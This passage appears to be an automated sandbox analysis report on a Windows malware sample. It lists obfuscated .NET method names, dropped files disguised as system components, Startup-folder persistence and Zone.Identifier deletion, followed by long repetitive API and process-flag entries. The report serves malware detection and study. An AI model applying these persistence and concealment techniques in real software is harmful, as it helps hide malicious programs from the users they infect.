        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeFile created: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeFile created: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeFile created: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batJump to dropped file
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeFile created: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batJump to dropped file
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSAT.lnkJump to behavior
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSAT.lnkJump to behavior
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSAT.lnkJump to behavior
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSAT.lnkJump to behavior

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe:Zone.Identifier read attributes | delete
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe:Zone.Identifier read attributes | delete
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009C4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A455FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009C4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A455FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_00984A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009E33C7 RtlEncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009E33C7 RtlEncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
